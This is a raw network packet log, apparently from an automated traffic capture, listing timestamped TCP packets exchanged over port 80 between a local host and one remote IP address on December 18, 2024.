                                                                    Dec 18, 2024 09:13:14.823059082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.823173046 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.823250055 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.825635910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.825726032 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.825783014 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.828231096 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.828326941 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.828386068 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.830846071 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.830970049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.831104994 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.833537102 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.833653927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.833843946 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.836039066 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.836103916 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.836429119 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.838684082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.838799953 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.838861942 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.841478109 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.841563940 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.841626883 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.843858957 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.843947887 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.844005108 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.846451998 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.846595049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.846682072 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.849036932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.849169016 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.849253893 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.851757050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.851813078 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.851881027 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.854228973 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.923727989 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.923800945 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.923842907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.924645901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.924700022 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.924721956 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.926459074 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.926513910 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.926564932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.928196907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.928261042 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.928296089 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.929929018 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.929992914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.930057049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.932019949 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.932087898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.932137966 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.933428049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.933480024 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.933528900 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.935190916 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.935249090 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.935308933 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.936978102 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.937053919 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.937287092 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.938570976 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.938640118 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.938673973 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.940464973 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.940525055 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.940545082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.941952944 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.942020893 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.942025900 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.943588972 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.943645000 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.943746090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.945255041 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.945333958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.945337057 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.946912050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.946990967 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.946993113 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.948508024 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.948560953 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.948648930 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.950089931 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.950135946 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.950180054 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.951791048 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.951850891 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.951855898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.953303099 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.953372955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.953377008 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.955152035 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.955195904 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.955210924 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.956445932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.956496954 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.956561089 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.958224058 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.958281994 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.958339930 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.959589005 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.959676981 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.959713936 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.961177111 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.961247921 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.961275101 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.962671995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.962730885 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.962863922 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.964442015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.964505911 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.964540005 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.965277910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.965315104 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.965352058 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.966048956 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.966105938 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.966114998 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.966952085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.967009068 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.967046976 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.967884064 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.967991114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.967997074 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.968799114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.968862057 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.968905926 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.969705105 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.969762087 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.969774961 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.970665932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.970717907 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.970750093 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.971008062 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.971641064 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.971694946 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.971863031 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.972457886 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.972508907 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.972523928 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.973412991 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.973484993 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.973526001 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.974375963 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.974389076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.974447012 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.975212097 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.975260973 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.975281954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.976099968 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.976154089 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.976197004 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.977020025 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.977087975 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.977133036 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.977907896 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.977967978 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.978009939 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.978837013 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.978924990 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.978936911 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.979732990 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.979795933 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.979839087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.980674028 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.980721951 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.980794907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.981658936 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.981693983 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.981796026 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.982485056 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.982533932 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.982575893 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.983414888 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.983474970 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.983586073 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.984318972 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.984410048 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.984419107 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.985214949 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.985265970 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.985279083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.986134052 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.986205101 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.986249924 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.987037897 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.987092972 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.987171888 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.988002062 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.988054037 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.988075018 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.043384075 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.043409109 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.043445110 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.081166983 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.086348057 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.090534925 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.090606928 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.090645075 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.090951920 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.090997934 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.091036081 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.092189074 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.092243910 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.092327118 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.092842102 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.092852116 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.092891932 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.106503010 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.114391088 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.114726067 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.114754915 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.114810944 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.115114927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.115215063 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.115233898 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.115880966 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.115933895 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.116072893 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.116791010 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.116842985 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.116864920 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.117712975 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.117782116 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.117794037 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.118596077 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.118705988 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.118721008 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.119523048 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.119579077 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.119649887 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.120429993 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.120487928 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.120501995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.120821953 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.121335983 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.121397018 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.121443987 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.122258902 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.122343063 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.122394085 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.123151064 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.123258114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.123301029 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.124054909 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.124174118 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.124247074 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.124988079 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.125039101 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.125101089 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.125906944 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.125935078 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.125968933 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.125993013 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.126833916 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.126897097 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.126940012 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.127787113 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.127845049 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.127913952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.128648996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.128710985 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.128740072 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.129566908 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.129618883 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.129672050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.130034924 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.130451918 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.130505085 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.130546093 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.131392956 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.131457090 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.131498098 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.132421017 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.132462025 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.132505894 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.133302927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.133358002 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.133372068 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.134123087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.134243011 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.134291887 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.135061026 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.135114908 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.135232925 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.135955095 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.135999918 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.136032104 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.136049986 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.136898994 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.136945009 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.137079954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.137789011 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.137875080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.137947083 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.138664007 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.138710022 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.138828993 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.139981985 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.140044928 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.140075922 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.140502930 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.140553951 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.140635014 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.141438961 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.141511917 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.141541958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.142352104 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.142424107 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.142620087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.143421888 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.143435001 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.143485069 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.144197941 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.144253969 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.144277096 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.145096064 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.145195961 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.145212889 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.145543098 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.145992041 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.146040916 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.146053076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.146991968 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.147042036 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.147110939 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.147877932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.147928953 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.147958994 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.148818970 CET8049716139.99.188.124192.168.2.5
